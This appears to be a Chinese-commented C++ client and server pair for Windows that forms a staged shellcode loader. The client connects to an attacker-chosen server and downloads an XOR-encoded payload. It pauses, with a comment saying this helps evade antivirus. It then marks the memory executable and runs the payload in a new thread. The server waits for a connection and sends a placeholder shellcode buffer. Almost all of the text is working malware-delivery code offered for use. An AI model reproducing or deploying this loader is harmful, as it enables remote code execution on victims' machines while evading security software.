客戶端:
#include <stdio.h>
#include <iostream>
#include <WinSock2.h>
#pragma comment(lib, "ws2_32.lib") //添加ws2_32動態庫
#pragma warning(disable:4996) //忽略舊函數使用的警告
using namespace std;
int main(int argc, char *argv[])
{
const int BUF_SIZE = 1024;
WSADATA wsd; //WSADATA變量
SOCKET sHost; // 服務器套接字socket
SOCKADDR_IN servAddr; //服務器地址
char buf[BUF_SIZE]; // 存放發送的數據緩沖區
char bufRecv[BUF_SIZE]; //接收收到的數據緩沖區
DWORD dwThreadId;
HANDLE hThread;
DWORD dwOldProtect;
int retVal; // 返回值
if (argc <= 2){
cout << "USAGE: client.exe <Server IP> <Server PORT>" << endl;
return -1;
}
if (WSAStartup(MAKEWORD(2, 2), &wsd) != 0) //初始化套結字動態庫
{
cout << "WSAStartup failed!" << endl;
return -1;
}
sHost = socket(AF_INET, SOCK_STREAM, 0); //創建套接字 IPV4 可靠的,雙向的類型服務提供商選擇
if (INVALID_SOCKET == sHost)
{
cout << "socket failed!" << endl;
WSACleanup();
return -1;
}
//設置服務器的地址
servAddr.sin_family = AF_INET; //指定IPV4
servAddr.sin_addr.s_addr = inet_addr(argv[1]); // 指定服務器的地址
servAddr.sin_port = htons((short)atoi(argv[2])); // 指定服務器的端口
retVal = connect(sHost, (LPSOCKADDR)&servAddr, sizeof(servAddr)); // 套接字 sockaddr的指針,也就是地址 第三個參數為SOCKADDR_IN結構體的大小
if (SOCKET_ERROR == retVal) //判斷是否連接成功
{
cout << "connect failed!" << endl;
closesocket(sHost);
WSACleanup();
return -1;
}
ZeroMemory(buf, BUF_SIZE); // buf指向的地址用0來填充
strcpy(buf, "ok"); //給ok兩個字節的字符串復制給buf區段
retVal = send(sHost, buf, strlen(buf), 0); //send的返回值
if (SOCKET_ERROR == retVal) //判斷是否發送成功
{
cout << "send failed!" << endl;
closesocket(sHost);
WSACleanup();
return -1;
}
cout << "Starting Download Payload" << endl;
ZeroMemory(bufRecv, BUF_SIZE); // bufRevc指向的地址用0來填充
Sleep(2000); //延遲兩秒起到免殺繞過的效果
recv(sHost, bufRecv, BUF_SIZE, 0); //bufRecv緩沖區接收 服務端發送來的數據
Sleep(4000);
closesocket(sHost);
WSACleanup();
for (int i = 0; i < sizeof(bufRecv); i++) { //采取傾旋的方式來進行異或解密
//Sleep(50);
_InterlockedXor8(bufRecv + i, 10);
}
cout << "加載shellcode中" << endl;
//下面就是開辟內存存儲shellcode 創建線程進行執行
char * shellcode = (char *)VirtualAlloc(
NULL,
BUF_SIZE,
MEM_COMMIT,
PAGE_READWRITE // 只申請可讀可寫
);
CopyMemory(shellcode, bufRecv, BUF_SIZE);
VirtualProtect(shellcode, BUF_SIZE, PAGE_EXECUTE, &dwOldProtect); // VirtualProtect改變它的屬性 -> 可執行
hThread = CreateThread(
NULL, // 安全描述符
NULL, // 棧的大小
(LPTHREAD_START_ROUTINE)shellcode, // 函數
NULL, // 參數
NULL, // 線程標志
&dwThreadId // 線程ID
);
WaitForSingleObject(hThread, INFINITE);
return 0;
}
服務端:
#include <WinSock2.h>
#include <iostream>
#pragma comment(lib, "ws2_32.lib")
using namespace std;
int main(int argc, char* argv[])
{
const int BUF_SIZE = 1024;
WSADATA wsd; //WSADATA變量
SOCKET sServer; //服務器套接字
SOCKET sClient; //客戶端套接字
SOCKADDR_IN addrServ;; //服務器地址
char buf[BUF_SIZE]; //接收數據緩沖區
char sendBuf[] = "你的shellcode"; //或者可以是傾旋用的xor加密方式來進行加密
int retVal; //返回值
if (argc <= 1){
cout << "USAGE: server.exe <Listen Port>" << endl;
return -1;
}
if (WSAStartup(MAKEWORD(2, 2), &wsd) != 0)//初始化套結字動態庫
{
cout << "WSAStartup failed!" << endl;
return 1;
}
//創建套接字
sServer = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (INVALID_SOCKET == sServer)
{
cout << "Socket Failed!" << endl;
WSACleanup();//釋放套接字資源;
return -1;
}
//服務器套接字地址
addrServ.sin_family = AF_INET;
addrServ.sin_port = htons((short)atoi(argv[1]));;
addrServ.sin_addr.s_addr = htonl(INADDR_ANY);
//綁定套接字
retVal = bind(sServer, (LPSOCKADDR)&addrServ, sizeof(SOCKADDR_IN));
if (SOCKET_ERROR == retVal)
{
cout << "Bind Failed!" << endl;
closesocket(sServer); //關閉套接字
WSACleanup(); //釋放套接字資源;
return -1;
}
//開始監聽
retVal = listen(sServer, 1);
if (SOCKET_ERROR == retVal)
{
cout << "Listen Failed!" << endl;
closesocket(sServer); //關閉套接字
WSACleanup(); //釋放套接字資源;
return -1;
}
cout << "開始監聽中...." << endl;
//接受客戶端請求
sockaddr_in addrClient;
int addrClientlen = sizeof(addrClient);
sClient = accept(sServer, (sockaddr FAR*)&addrClient, &addrClientlen); // 生成對應當前客戶端連接的套接字sClient
if (INVALID_SOCKET == sClient)
{
cout << "Accept Failed!" << endl;
closesocket(sServer); //關閉套接字
WSACleanup(); //釋放套接字資源;
return -1;
}
int flag = 1; //只接收一次
while (flag)
{
//接收客戶端數據
ZeroMemory(buf, BUF_SIZE); // 填充為0 防止內存分配發生意外
retVal = recv(sClient, buf, BUF_SIZE, 0); // 接收數據放在buf緩沖區
if (SOCKET_ERROR == retVal) //判斷是否接收錯誤
{
cout << "Recv Failed!" << endl;
closesocket(sServer); //關閉套接字
closesocket(sClient); //關閉套接字
WSACleanup(); //釋放套接字資源;
return -1;
}
if (buf[0] == '0')
break;
cout << "成功建立通信" << endl;
send(sClient, sendBuf, sizeof(sendBuf), 0);
cout << "向客戶端發送shellcode..." << endl;
cout << "發送shellcode成功!" << endl;
flag = 0;
}
//退出
closesocket(sServer); //關閉套接字
closesocket(sClient); //關閉套接字
WSACleanup(); //釋放套接字資源;
return 0;
}
